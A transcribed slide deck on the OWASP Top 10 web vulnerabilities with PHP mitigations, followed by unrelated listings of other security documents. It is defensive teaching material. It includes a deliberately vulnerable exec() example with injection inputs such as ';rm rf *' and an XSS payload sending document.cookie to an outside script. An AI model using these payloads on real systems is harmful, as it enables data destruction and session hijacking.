Top 10 Web Application Security Vulnerabilities - with focus on PHP

Size: px
Start display at page:

Download "Top 10 Web Application Security Vulnerabilities - with focus on PHP"

Transcription

1 Top 10 Web Application Security Vulnerabilities - with focus on PHP Louise Berthilson Alberto Escudero Pascual < 1

2 Resources The Top 10 Project by OWASP PHP and the OWASP Top Ten Security Vulnerabilities by David Sklar top ten The Top 20 Most Critical Internet Security Vulnerabilities (Updated) The Experts Consensus by SANS Institute 2

3 Why protect PHP? PHP is the most widely used scripting language for the web. 50% of all Apache servers have PHP installed A large number of CMS, portals, Bulletin Boards, Discussion Forums are written in PHP. 3

4 OWASP Open Web Application Security Project Dedicated to find and fight the causes of insecure software All results are Free and open source Sponsored by OWASP Foundation, a 501c3 not for profit charitable organization 4

5 OWASP Top Ten Project Provides a minimum standard for web application security. Represents a broad consensus about what the most critical web application security flaws are. Project members include a variety of international security experts A Spanish version of the Top Ten Project is on its way 5

6 OWASP Top Ten Project 1)Unvalidated input 2)Broken Access Control 3)Broken Authentication and Session Management 4)Cross Site Scripting 5)Buffer Overflow 6)Injection Flaws 7)Improper Error handling 8)Insecure Storage 9)Application Denial of Service 10) Insecure Configuration Management 6

7 1. Unvalidated Input Input from HTTP requests (and sometimes files) determines response from web application Tampering with any part of an HTTP request (incl. url's, query strings, headers, cookies, form fields, hidden fields) can result in: forced browsing, command insertion cross site scripting, buffer overflows format string attacks, SQL injection cookie poisoning, hidden field manipulation 7

8 1) Unvalidated Input How to protect yourself Validate input before usage (see next slide) Use the OWASP Filters project 8

9 1) Unvalidated Input Validate input by filtering Data type (string, integer, real, etc ) Allowed character set Minimum and maximum length Whether null is allowed Whether the parameter is required or not Whether duplicates are allowed Numeric range Specific legal values (enumeration) Specific patterns (regular expressions) 9

10 1) Unvalidated Input PHP Example $month = $_GET['month']; $year = $_GET['year']; exec("cal $month $year", $result); print "<PRE>"; foreach ($result as $r) { print "$r<br>"; } print "</PRE>"; 10

11 1) Unvalidated Input PHP Example How about appending the following data: ";ls la" ";rm rf *" Use regular expression to verify input: if (!preg_match("/^[0 9]{1,2}$/", $month)) die("bad month, please re enter."); if (!preg_match("/^[0 9]{4}$/", $year)) die("bad year, please re enter."); 11

12 1) Unvalidated Input How to protect yourself (PHP) Turn of variable register_globals (off by default in PHP and later) Access values from URLs, forms, and cookies through the superglobal arrays $_GET, $_POST, and $_COOKIE 12

13 2. Broken Access Control (authorization) Access control: how a web application grants access to content and functions to some users and not others. Administrative interfaces is a typical access control that causes problems. 13

14 2) Broken Access Control Some Access Control Issues Insecure ID's Forced Browsing Past Access Control Checks Path Traversal File Permissions Client Side Caching 14

15 2) Broken Access Control How to protect yourself Think through an application s access control requirements before starting to implement Document it in a web application security policy Use an access control matrix to define the access control rules Test the access control system extensively (with a variety of accounts and extensive attempts to access unauthorized content or functions) 15

16 2) Broken Access Control How to protect yourself (PHP) Instead of creating your own access control solution, use PEAR modules PHP Extension and Application Repository Auth (cookie based authentication) methods for creating an authentication system using PHP Auth_HTTP (browser based authentication) similar to Apache's realm based.htaccess authentication 16

17 2) Broken Access Control How to protect yourself (PHP) Always check the user's access privileges upon every load of a restricted page of your PHP application Checking the index page only, can offer an attacker to bypass the credential checking process by entering a URL to a "deeper" page Always place configuration files outside your Webaccessible directory 17

18 2) Broken Access Control How to protect yourself (PHP) Never make a backup of a php file in your Web exposed directory by adding.bak or another extension to the filename Can even be indexed by Google! Rather code.bak.php than code.php.bak Safest, use a CVS for version control 18

19 3. Broken Authentication and Session Management All aspects of handling user authentication and managing active sessions Including password change, forgot my password, remember my password, account update, and other related functions Re authentication should always be required in all account management functions (even if the user has a valid session id) to avoid walk by's 19

20 3) Broken Authentication and Session Management How to protect yourself Password strength Minimum size and complexity Requirement to change password periodically Prevention to reuse previous password Password use Restricted to a defined number of login attempts per unit of time Do not indicate whether it was the username or password that was wrong if a login attempt fails Inform users of the date/time of their last successful login and the number of failed access attempts to their account since that time. 20

21 3) Broken Authentication and Session Management How to protect yourself Password change controls Both old and new password must be provided when changing password When a forgotten password is ed to a user, re authentication of the user should be required whenever the user is changing its e mail address Password storage hashed or encrypted form (regardless of where they are stored) Hashed form is preferred since it is not reversible Should never be hard coded in any source code 21

22 3) Broken Authentication and Session Management How to protect yourself Protecting Credentials in Transit Encrypt entire login transaction using something like SSL Session ID protection Ideally, a user s entire session should be protected via SSL Never include Session ID in the URL (cached by browser and forwarded) Session ID should be long, complicated, random numbers that cannot be easily guessed 22

23 3) Broken Authentication and Session Management How to protect yourself Account lists Avoid users to gain access to lists of the account names on the site (if needed, use pseudonyms (aliases)) Browser caching Authentication and session data should never be submitted as part of a GET (use POST instead) Authentication pages should be marked with all varieties of the no cache tag (prevent usage of back button ) Many browsers support autocomplete=false flag to prevent storing of credentials in autocomplete caches 23

24 3) Broken Authentication and Session Management How to protect yourself Thrust relationships Avoid implicit trust between components whenever possible Each component should authenticate itself If trust relationships are required, strong procedural and architecture mechanisms should be in place to ensure that such trust cannot be abused as the site architecture evolves over time 24

25 3) Broken Authentication and Session Management How to protect yourself (PHP) Use PHP's built in session management functions Consider how your server is configured to store session information In a database: Yes! In a part of the file system that only trusted users can access: Yes! As world readable files in /tmp: No! Session specific traffic should be sent over SSL Configuration in webserver 25

26 4. Cross Site Scripting (XSS) XSS is a subset of user validation XSS flaws are frequent in web applications A malicious user embeds scripting commands (usually JavaScript) in data that is displayed and therefore executed by another user 26

27 4. Cross Site Scripting (XSS) The end user s browser can not know if the script should be trusted or not, and will execute the script. The malicious script can access any cookies, session tokens, or other sensitive information retained by your browser and used with that site. 27

28 4) Cross Site Scripting Example of code attached <script> document.location = ' bin/cookie.php?' + document.cookie; </script> 28

29 4) Cross Site Scripting Two types of attacks Stored: injected code is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field. Reflected: injected code is reflected off the web server, such as in an error message, search result, or any other response that includes some or all of the input sent to the server as part of the request. Reflected attacks are delivered to victims via another route (i.e. e mail message) 29

30 4) Cross site Scripting How to protect yourself Perform validation of all headers, cookies, query strings, form fields, and hidden fields (i.e., all parameters) against a rigorous specification of what should be allowed. A positive security policy that specifies what is allowed is recommended A negative or attack signature based policy is difficult to maintain and is likely to be incomplete. Never display any information coming from outside your program without filtering it first. 30

31 4) Cross site Scripting How to protect yourself (PHP) htmlspecialchars() Turns & > " < into their HTML entity equivalents. Xan also convert single quotes by passing ENT_QUOTES as a second argument. strtr() Use strstr() to replace characters with their entity equivalents, like: $safer = strtr($untrusted, array('(' => '(', ')' => ')')); 31

32 4) Cross site Scripting How to protect yourself (PHP) strip_tags() Removes HTML and PHP tags from a string utf8_decode() Converts the ISO characters in a string encoded with the Unicode UTF 8 encoding to single byte ASCII characters. Sometimes cross site scripting attackers attempt to hide their attacks in Unicode encoding. You can use utf8_decode() to peel off that encoding. 32

33 5. Buffer Overflow Probably the best known form of software security vulnerability Not easy to discover, and when discovered, generally extremely difficult to exploit 33

34 5) Buffer Overflow Buffer overflow in PHP? Memory can not be allocate at runtime in PHP Unlike C, there are no pointers in PHP code Your code can not cause buffer overflow but... There can be buffer overflows in PHP itself (and its extensions). Subscribe to the php announce mailing list to keep yourself updated about patches and new releases. 34

35 5) Buffer Overflow How to protect yourself Keep up with the latest bug reports for your web and application server products Apply the latest patches to these products Periodically scan your web site with one or more of the commonly available scanners that look for buffer overflow flaws 35

36 5) Buffer Overflow How to protect yourself For custom application code Review all code that accepts input from users via the HTTP request Ensure that it provides appropriate size checking on all 36

37 6. Injection Flaws Allow attackers to relay malicious code through a web application to another system Scripts in perl, python, and other languages can be injected into poorly designed web applications and executed 37

38 6) Injection Flaws What do they target? Calls to the operating system via system calls Calls external programs via shell commands Sendmail Calls to backend databases via SQL (i.e., SQL injection). 38

39 6) Injection Flaws How to protect yourself Avoid accessing external interpreters wherever possible. Use language specific libraries for many shell commands and system calls Carefully validate the data provided Make sure that the web application runs with only the privileges it absolutely needs to perform its function. Do not run the webserver as root Do not access a database as DBADMIN 39

40 6) Injection Flaws How to protect yourself (PHP) Before opening an external file, canonicalize its pathname with realpath() Expands all symbolic links Translates. (current directory).. (parent directory) Removes duplicate directory separators. Afterwards, test the pathname and make sure it meets certain criteria under the web server document root In a user's home directory 40

41 6) Injection Flaws How to protect yourself (PHP) User input to a SQL queries, escape input with addslashes() mysql_real_escape_string() (MySQL) mysql_escape_string() (MySQL, PHP earlier than 4.3.0) DB::quote() (PEAR) 41

42 7. Improper Error handling Web applications frequently generate error conditions out of memory, null pointer exceptions system call failure, database unavailable, network timeout Errors must be handled in a way so that they provide Meaningful error message to the user Diagnostic information to the site maintainers No useful information to an attacker 42

43 7) Improper Error Handling What does it imply? An attacker can cause errors to occur that the web application does not handle By doing so, they can gain detailed system information, deny service, cause security mechanisms to fail, or crash the server Detailed internal error messages that can be displayed are: stack traces, database dumps, and error codes 43

44 7) Improper Error Handling How to protect yourself Create Error handling policy Types of errors to be handled What information should be reported to the user What information should be logged Crate site specific designed error messages that are helpful to the user without revealing unnecessary internal details. All developers need to understand the policy and ensure that their code follows it 44

45 7) Improper Error Handling How to protect yourself (PHP) Tell PHP to put error messages in your server's error log instead of displaying them to a user In php.ini log_errors = On display_errors = Off 45

46 8. Insecure Storage There is a need to store sensitive information In a database or on a file system The information could be: Passwords Credit card numbers Account records Proprietary information. 46

47 8) Insecure Storage Issues of Insecure Storage Encryption techniques are frequently used Other aspects of securing the data is ofter forgotten: Insecure storage of keys, certificates, and passwords Improper storage of secrets in memory Poor sources of randomness Poor choice of algorithm Attempting to invent a new encryption algorithm Failure to include support for encryption key changes and other required maintenance procedures 47

48 8) Insecure Storage How to protect yourself Minimize the use of encryption Store sensitive information only if it is absolutely necessary Alternatively, ask use to re enter sensitive data (like credit number) Instead of using encryption use a one way function SHA 1 (hash) If you must use cryptography, choose a well tested library that has been exposed to public scrutiny 48

49 8) Insecure Storage How to protect yourself (PHP) mcrypt provides a standardized interface to many popular cryptographic algorithms Use mcrypt instead of creating your own encryption scheme 49

50 9. Application Denial of Service To consume web application resources to a point where other legitimate users can no longer access or use the application. Attackers can lock users out of their accounts or even cause the entire application to fail 50

51 9) Application Denial of Service Limited resources Bandwidth Database connections Disk storage CPU Memory Threads Application specific resources 51

52 9) Application Denial of Service Targeting single users Lock out a legitimate user by sending invalid credentials until the system locks out the account. Request a new password for a user, forcing them to access their account to regain access. If the system locks any resources for a single user, then an attacker could potentially tie them up so others could not use them. 52

53 9) Application Denial of Service How to protect yourself Limit the resources allocated to any user to a minimum. Authenticated users Establish quotas that limit the load a particular user can put on the system. If multiple requests from single user (one session), drop the oldest request Unauthenticated users Avoid access to expensive resources (like database) Consider caching content (instead of accessing databases) 53

54 9) Application Denial of Service How to protect yourself Run remote administration tools over an SSL connection prevents sniffing of passwords and content Third party software with remote admin component Change default admin user name/password Change default administrative URL Consider running admin tools on a different web server 54

55 10. Insecure Configuration Management A strong server configuration standard is critical to a secure web application Many configuration options that affect security exists Web/application servers are not secure out of the box. 55

56 10) Insecure Configuration Management Server Configuration Issues Un patched security flaws in the server software Server software flaws or mis configurations that permit directory listing and directory traversal attacks Unnecessary default, backup, or sample files, including scripts, applications, configuration files, and web pages Improper file and directory permissions Unnecessary services enabled, including content management and remote administration 56

57 10) Insecure Configuration Management Server Configuration Issues Default accounts with their default passwords Administrative or debugging functions that are enabled or accessible Overly informative error messages Mis configured SSL certificates and encryption settings Use of self signed certificates to achieve authentication and man in the middle protection Use of default certificates 57

58 10) Insecure Configuration Management How to protect yourself Create hardening Guidelines that includes: Configuring all security mechanisms Turning off all unused services Setting up roles, permissions, and accounts, including disabling all default accounts or changing their passwords Logging and alerts 58

59 10) Insecure Configuration Management How to protect yourself Maintenance Monitoring the latest security vulnerabilities published Applying the latest security patches Updating the security configuration guideline Regular vulnerability scanning from both internal and external perspectives Regular internal reviews of the server s security configuration as compared to your configuration guide Regular status reports to upper management documenting overall security posture 59

60 10) Insecure Configuration Management How to protect yourself (PHP) Stay away from the automatic PHP source display handler since it lets attackers look at your code AddType application/x httpd php source.phps Of the two sample php.ini files distributed with PHP use php.inirecommended as a base for your site configuration 60

61 General Security Advices for PHP 1) Apply all vendor patches for PHP and PHP based applications. 2) Preform frequent web scanning in environments where a large number of PHP applications are in use 3) Use the following PHP Configuration that is safer: register_globals (should be off) allow_url_fopen (should be off) magic_gpc_quotes (should be off for well written software, should be on for poorly written PHP 3 and PHP 4 scripts,) safe_mode and open_basedir (should be enabled and correctly configured) 61

62 General Security Advices for PHP 4) Configure Apache mod_security and mod_rewrite filters to block PHP attacks. 5) Use tools like Paros Proxy for conducting automated SQL Injection tests against your PHP applications. 6) Upgrade to PHP 5 as it will eliminate many latent PHP security issues 7) Follow the "Least Privilege" principle for running PHP using tools like PHPsuExec, php_suexec orsuphp from suphp 8) Use any Intrusion Prevention/Detection Systems to block/alert on malicious HTTP requests. 62

What is Web Security? Motivation

What is Web Security? Motivation brucker@inf.ethz.ch http://www.brucker.ch/ Information Security ETH Zürich Zürich, Switzerland Information Security Fundamentals March 23, 2004 The End Users View The Server Providers View What is Web

More information

Secure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda

Secure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda Secure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda 1. Introductions for new members (5 minutes) 2. Name of group 3. Current

More information

Top Ten Web Application Vulnerabilities in J2EE. Vincent Partington and Eelco Klaver Xebia

Top Ten Web Application Vulnerabilities in J2EE. Vincent Partington and Eelco Klaver Xebia Top Ten Web Application Vulnerabilities in J2EE Vincent Partington and Eelco Klaver Xebia Introduction Open Web Application Security Project is an open project aimed at identifying and preventing causes

More information

3. Broken Account and Session Management. 4. Cross-Site Scripting (XSS) Flaws. Web browsers execute code sent from websites. Account Management

3. Broken Account and Session Management. 4. Cross-Site Scripting (XSS) Flaws. Web browsers execute code sent from websites. Account Management What is an? s Ten Most Critical Web Application Security Vulnerabilities Anthony LAI, CISSP, CISA Chapter Leader (Hong Kong) anthonylai@owasp.org Open Web Application Security Project http://www.owasp.org

More information

FINAL DoIT 11.03.2015 - v.4 PAYMENT CARD INDUSTRY DATA SECURITY STANDARDS APPLICATION DEVELOPMENT AND MAINTENANCE PROCEDURES

FINAL DoIT 11.03.2015 - v.4 PAYMENT CARD INDUSTRY DATA SECURITY STANDARDS APPLICATION DEVELOPMENT AND MAINTENANCE PROCEDURES Purpose: The Department of Information Technology (DoIT) is committed to developing secure applications. DoIT s System Development Methodology (SDM) and Application Development requirements ensure that

More information

Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security

Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security Presented 2009-05-29 by David Strauss Thinking Securely Security is a process, not

More information

Thick Client Application Security

Thick Client Application Security Thick Client Application Security Arindam Mandal (arindam.mandal@paladion.net) (http://www.paladion.net) January 2005 This paper discusses the critical vulnerabilities and corresponding risks in a two

More information

Criteria for web application security check. Version 2015.1

Criteria for web application security check. Version 2015.1 Criteria for web application security check Version 2015.1 i Content Introduction... iii ISC- P- 001 ISC- P- 001.1 ISC- P- 001.2 ISC- P- 001.3 ISC- P- 001.4 ISC- P- 001.5 ISC- P- 001.6 ISC- P- 001.7 ISC-

More information

ArcGIS Server Security Threats & Best Practices 2014. David Cordes Michael Young

ArcGIS Server Security Threats & Best Practices 2014. David Cordes Michael Young ArcGIS Server Security Threats & Best Practices 2014 David Cordes Michael Young Agenda Introduction Threats Best practice - ArcGIS Server settings - Infrastructure settings - Processes Summary Introduction

More information

WHITE PAPER. FortiWeb and the OWASP Top 10 Mitigating the most dangerous application security threats

WHITE PAPER. FortiWeb and the OWASP Top 10 Mitigating the most dangerous application security threats WHITE PAPER FortiWeb and the OWASP Top 10 PAGE 2 Introduction The Open Web Application Security project (OWASP) Top Ten provides a powerful awareness document for web application security. The OWASP Top

More information

Web application security

Web application security Web application security Sebastian Lopienski CERN Computer Security Team openlab and summer lectures 2010 (non-web question) Is this OK? int set_non_root_uid(int uid) { // making sure that uid is not 0

More information

External Vulnerability Assessment. -Technical Summary- ABC ORGANIZATION

External Vulnerability Assessment. -Technical Summary- ABC ORGANIZATION External Vulnerability Assessment -Technical Summary- Prepared for: ABC ORGANIZATI On March 9, 2008 Prepared by: AOS Security Solutions 1 of 13 Table of Contents Executive Summary... 3 Discovered Security

More information

OWASP and OWASP Top 10 (2007 Update) OWASP. The OWASP Foundation. Dave Wichers. The OWASP Foundation. OWASP Conferences Chair dave.wichers@owasp.

OWASP and OWASP Top 10 (2007 Update) OWASP. The OWASP Foundation. Dave Wichers. The OWASP Foundation. OWASP Conferences Chair dave.wichers@owasp. and Top 10 (2007 Update) Dave Wichers The Foundation Conferences Chair dave.wichers@owasp.org COO, Aspect Security dave.wichers@aspectsecurity.com Copyright 2007 - The Foundation This work is available

More information

Where every interaction matters.

Where every interaction matters. Where every interaction matters. Peer 1 Vigilant Web Application Firewall Powered by Alert Logic The Open Web Application Security Project (OWASP) Top Ten Web Security Risks and Countermeasures White Paper

More information

Application Security Testing. Erez Metula (CISSP), Founder Application Security Expert ErezMetula@AppSec.co.il

Application Security Testing. Erez Metula (CISSP), Founder Application Security Expert ErezMetula@AppSec.co.il Application Security Testing Erez Metula (CISSP), Founder Application Security Expert ErezMetula@AppSec.co.il Agenda The most common security vulnerabilities you should test for Understanding the problems

More information

Columbia University Web Security Standards and Practices. Objective and Scope

Columbia University Web Security Standards and Practices. Objective and Scope Columbia University Web Security Standards and Practices Objective and Scope Effective Date: January 2011 This Web Security Standards and Practices document establishes a baseline of security related requirements

More information

Web Application Guidelines

Web Application Guidelines Web Application Guidelines Web applications have become one of the most important topics in the security field. This is for several reasons: It can be simple for anyone to create working code without security

More information

Web Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability

Web Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability Web Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability WWW Based upon HTTP and HTML Runs in TCP s application layer Runs on top of the Internet Used to exchange

More information

Last update: February 23, 2004

Last update: February 23, 2004 Last update: February 23, 2004 Web Security Glossary The Web Security Glossary is an alphabetical index of terms and terminology relating to web application security. The purpose of the Glossary is to

More information

FINAL DoIT 04.01.2013- v.8 APPLICATION SECURITY PROCEDURE

FINAL DoIT 04.01.2013- v.8 APPLICATION SECURITY PROCEDURE Purpose: This procedure identifies what is required to ensure the development of a secure application. Procedure: The five basic areas covered by this document include: Standards for Privacy and Security

More information

Web Application Security

Web Application Security Web Application Security Prof. Sukumar Nandi Indian Institute of Technology Guwahati Agenda Web Application basics Web Network Security Web Host Security Web Application Security Best Practices Questions?

More information

Magento Security and Vulnerabilities. Roman Stepanov

Magento Security and Vulnerabilities. Roman Stepanov Magento Security and Vulnerabilities Roman Stepanov http://ice.eltrino.com/ Table of contents Introduction Open Web Application Security Project OWASP TOP 10 List Common issues in Magento A1 Injection

More information

Sitefinity Security and Best Practices

Sitefinity Security and Best Practices Sitefinity Security and Best Practices Table of Contents Overview The Ten Most Critical Web Application Security Risks Injection Cross-Site-Scripting (XSS) Broken Authentication and Session Management

More information

Creating Stronger, Safer, Web Facing Code. JPL IT Security Mary Rivera June 17, 2011

Creating Stronger, Safer, Web Facing Code. JPL IT Security Mary Rivera June 17, 2011 Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011 Agenda Evolving Threats Operating System Application User Generated Content JPL s Application Security Program Securing

More information

Simon Fraser University. Web Security. Dr. Abhijit Sen CMPT 470

Simon Fraser University. Web Security. Dr. Abhijit Sen CMPT 470 Web Security Dr. Abhijit Sen 95% of web apps have Vulnerabilities Cross-site scripting (80 per cent) SQL injection (62 per cent) Parameter tampering (60 per cent) http://www.vnunet.com/vnunet/news/2124247/web-applicationswide-open-hackers

More information

Web Application Security

Web Application Security E-SPIN PROFESSIONAL BOOK Vulnerability Management Web Application Security ALL THE PRACTICAL KNOW HOW AND HOW TO RELATED TO THE SUBJECT MATTERS. COMBATING THE WEB VULNERABILITY THREAT Editor s Summary

More information

Essential IT Security Testing

Essential IT Security Testing Essential IT Security Testing Application Security Testing for System Testers By Andrew Muller Director of Ionize Who is this guy? IT Security consultant to the stars Member of OWASP Member of IT-012-04

More information

Out of the Fire - Adding Layers of Protection When Deploying Oracle EBS to the Internet

Out of the Fire - Adding Layers of Protection When Deploying Oracle EBS to the Internet Out of the Fire - Adding Layers of Protection When Deploying Oracle EBS to the Internet March 8, 2012 Stephen Kost Chief Technology Officer Integrigy Corporation Phil Reimann Director of Business Development

More information

Web Application Penetration Testing

Web Application Penetration Testing Web Application Penetration Testing 2010 2010 AT&T Intellectual Property. All rights reserved. AT&T and the AT&T logo are trademarks of AT&T Intellectual Property. Will Bechtel William.Bechtel@att.com

More information

Check list for web developers

Check list for web developers Check list for web developers Requirement Yes No Remarks 1. Input Validation 1.1) Have you done input validation for all the user inputs using white listing and/or sanitization? 1.2) Does the input validation

More information

Implementation of Web Application Firewall

Implementation of Web Application Firewall Implementation of Web Application Firewall OuTian 1 Introduction Abstract Web 層 應 用 程 式 之 攻 擊 日 趨 嚴 重, 而 國 內 多 數 企 業 仍 不 知 該 如 何 以 資 安 設 備 阻 擋, 仍 在 採 購 傳 統 的 Firewall/IPS,

More information

Detecting Web Application Vulnerabilities Using Open Source Means. OWASP 3rd Free / Libre / Open Source Software (FLOSS) Conference 27/5/2008

Detecting Web Application Vulnerabilities Using Open Source Means. OWASP 3rd Free / Libre / Open Source Software (FLOSS) Conference 27/5/2008 Detecting Web Application Vulnerabilities Using Open Source Means OWASP 3rd Free / Libre / Open Source Software (FLOSS) Conference 27/5/2008 Kostas Papapanagiotou Committee Member OWASP Greek Chapter conpap@owasp.gr

More information

Adobe Systems Incorporated

Adobe Systems Incorporated Adobe Connect 9.2 Page 1 of 8 Adobe Systems Incorporated Adobe Connect 9.2 Hosted Solution June 20 th 2014 Adobe Connect 9.2 Page 2 of 8 Table of Contents Engagement Overview... 3 About Connect 9.2...

More information

(WAPT) Web Application Penetration Testing

(WAPT) Web Application Penetration Testing (WAPT) Web Application Penetration Testing Module 0: Introduction 1. Introduction to the course. 2. How to get most out of the course 3. Resources you will need for the course 4. What is WAPT? Module 1:

More information

The purpose of this report is to educate our prospective clients about capabilities of Hackers Locked.

The purpose of this report is to educate our prospective clients about capabilities of Hackers Locked. This sample report is published with prior consent of our client in view of the fact that the current release of this web application is three major releases ahead in its life cycle. Issues pointed out

More information

Passing PCI Compliance How to Address the Application Security Mandates

Passing PCI Compliance How to Address the Application Security Mandates Passing PCI Compliance How to Address the Application Security Mandates The Payment Card Industry Data Security Standards includes several requirements that mandate security at the application layer. These

More information

BASELINE SECURITY TEST PLAN FOR EDUCATIONAL WEB AND MOBILE APPLICATIONS

BASELINE SECURITY TEST PLAN FOR EDUCATIONAL WEB AND MOBILE APPLICATIONS BASELINE SECURITY TEST PLAN FOR EDUCATIONAL WEB AND MOBILE APPLICATIONS Published by Tony Porterfield Feb 1, 2015. Overview The intent of this test plan is to evaluate a baseline set of data security practices

More information

Security in Network-Based Applications. ITIS 4166/5166 Network Based Application Development. Network Security. Agenda. References

Security in Network-Based Applications. ITIS 4166/5166 Network Based Application Development. Network Security. Agenda. References ITIS 4166/5166 Network Based Application Development Security in Network-Based Applications Anita Raja Spring 2006 Agenda Network Security. Application Security. Web Services Security. References Open

More information

How to break in. Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering

How to break in. Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering How to break in Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering Time Agenda Agenda Item 9:30 10:00 Introduction 10:00 10:45 Web Application Penetration

More information

Intrusion detection for web applications

Intrusion detection for web applications Intrusion detection for web applications Intrusion detection for web applications Łukasz Pilorz Application Security Team, Allegro.pl Reasons for using IDS solutions known weaknesses and vulnerabilities

More information

Web Application Security

Web Application Security Web Application Security Security Mitigations Halito 26 juni 2014 Content Content... 2 Scope of this document... 3 OWASP Top 10... 4 A1 - Injection... 4... 4... 4 A2 - Broken Authentication and Session

More information

Ruby on Rails Secure Coding Recommendations

Ruby on Rails Secure Coding Recommendations Introduction Altius IT s list of Ruby on Rails Secure Coding Recommendations is based upon security best practices. This list may not be complete and Altius IT recommends this list be augmented with additional

More information

Secure Web Application Coding Team February 23, 2006 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda

Secure Web Application Coding Team February 23, 2006 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda Secure Web Application Coding Team February 23, 2006 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda 1. John Ockerbloom to run meeting thank you! 2. Susan Kennedy to take minutes 3. Team Website

More information

The Top Web Application Attacks: Are you vulnerable?

The Top Web Application Attacks: Are you vulnerable? QM07 The Top Web Application Attacks: Are you vulnerable? John Burroughs, CISSP Sr Security Architect, Watchfire Solutions jburroughs@uk.ibm.com Agenda Current State of Web Application Security Understanding

More information

Web Application Security. Vulnerabilities, Weakness and Countermeasures. Massimo Cotelli CISSP. Secure

Web Application Security. Vulnerabilities, Weakness and Countermeasures. Massimo Cotelli CISSP. Secure Vulnerabilities, Weakness and Countermeasures Massimo Cotelli CISSP Secure : Goal of This Talk Security awareness purpose Know the Web Application vulnerabilities Understand the impacts and consequences

More information

OWASP TOP 10 ILIA ALSHANETSKY @ILIAA HTTPS://JOIND.IN/15741

OWASP TOP 10 ILIA ALSHANETSKY @ILIAA HTTPS://JOIND.IN/15741 OWASP TOP 10 ILIA ALSHANETSKY @ILIAA HTTPS://JOIND.IN/15741 ME, MYSELF & I PHP Core Developer Author of Guide to PHP Security Security Aficionado THE CONUNDRUM USABILITY SECURITY YOU CAN HAVE ONE ;-) OPEN

More information

CSE598i - Web 2.0 Security OWASP Top 10: The Ten Most Critical Web Application Security Vulnerabilities

CSE598i - Web 2.0 Security OWASP Top 10: The Ten Most Critical Web Application Security Vulnerabilities CSE598i - Web 2.0 Security OWASP Top 10: The Ten Most Critical Web Application Security Vulnerabilities Thomas Moyer Spring 2010 1 Web Applications What has changed with web applications? Traditional applications

More information

Chapter 1 Web Application (In)security 1

Chapter 1 Web Application (In)security 1 Introduction xxiii Chapter 1 Web Application (In)security 1 The Evolution of Web Applications 2 Common Web Application Functions 4 Benefits of Web Applications 5 Web Application Security 6 "This Site Is

More information

Attack Vector Detail Report Atlassian

Attack Vector Detail Report Atlassian Attack Vector Detail Report Atlassian Report As Of Tuesday, March 24, 2015 Prepared By Report Description Notes cdavies@atlassian.com The Attack Vector Details report provides details of vulnerability

More information

Web Application Report

Web Application Report Web Application Report This report includes important security information about your Web Application. Security Report This report was created by IBM Rational AppScan 8.5.0.1 11/14/2012 8:52:13 AM 11/14/2012

More information

Columbia University Web Application Security Standards and Practices. Objective and Scope

Columbia University Web Application Security Standards and Practices. Objective and Scope Columbia University Web Application Security Standards and Practices Objective and Scope Effective Date: January 2011 This Web Application Security Standards and Practices document establishes a baseline

More information

Web Application Security Assessment and Vulnerability Mitigation Tests

Web Application Security Assessment and Vulnerability Mitigation Tests White paper BMC Remedy Action Request System 7.6.04 Web Application Security Assessment and Vulnerability Mitigation Tests January 2011 www.bmc.com Contacting BMC Software You can access the BMC Software

More information

Introduction:... 1 Security in SDLC:... 2 Penetration Testing Methodology: Case Study... 3

Introduction:... 1 Security in SDLC:... 2 Penetration Testing Methodology: Case Study... 3 Table of Contents Introduction:... 1 Security in SDLC:... 2 Penetration Testing Methodology: Case Study... 3 Information Gathering... 3 Vulnerability Testing... 7 OWASP TOP 10 Vulnerabilities:... 8 Injection

More information

WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY

WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY www.alliancetechpartners.com WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY More than 70% of all websites have vulnerabilities

More information

ABC LTD EXTERNAL WEBSITE AND INFRASTRUCTURE IT HEALTH CHECK (ITHC) / PENETRATION TEST

ABC LTD EXTERNAL WEBSITE AND INFRASTRUCTURE IT HEALTH CHECK (ITHC) / PENETRATION TEST ABC LTD EXTERNAL WEBSITE AND INFRASTRUCTURE IT HEALTH CHECK (ITHC) / PENETRATION TEST Performed Between Testing start date and end date By SSL247 Limited SSL247 Limited 63, Lisson Street Marylebone London

More information

OWASP Web Application Penetration Checklist. Version 1.1

OWASP Web Application Penetration Checklist. Version 1.1 Version 1.1 July 14, 2004 This document is released under the GNU documentation license and is Copyrighted to the OWASP Foundation. You should read and understand that license and copyright conditions.

More information

OWASP Top Ten Tools and Tactics

OWASP Top Ten Tools and Tactics OWASP Top Ten Tools and Tactics Russ McRee Copyright 2012 HolisticInfoSec.org SANSFIRE 2012 10 JULY Welcome Manager, Security Analytics for Microsoft Online Services Security & Compliance Writer (toolsmith),

More information

Web Application Attacks And WAF Evasion

Web Application Attacks And WAF Evasion Web Application Attacks And WAF Evasion Ahmed ALaa (EG-CERT) 19 March 2013 What Are We Going To Talk About? - introduction to web attacks - OWASP organization - OWASP frameworks - Crawling & info. gathering

More information

Webapps Vulnerability Report

Webapps Vulnerability Report Tuesday, May 1, 2012 Webapps Vulnerability Report Introduction This report provides detailed information of every vulnerability that was found and successfully exploited by CORE Impact Professional during

More information

Information Technology Policy

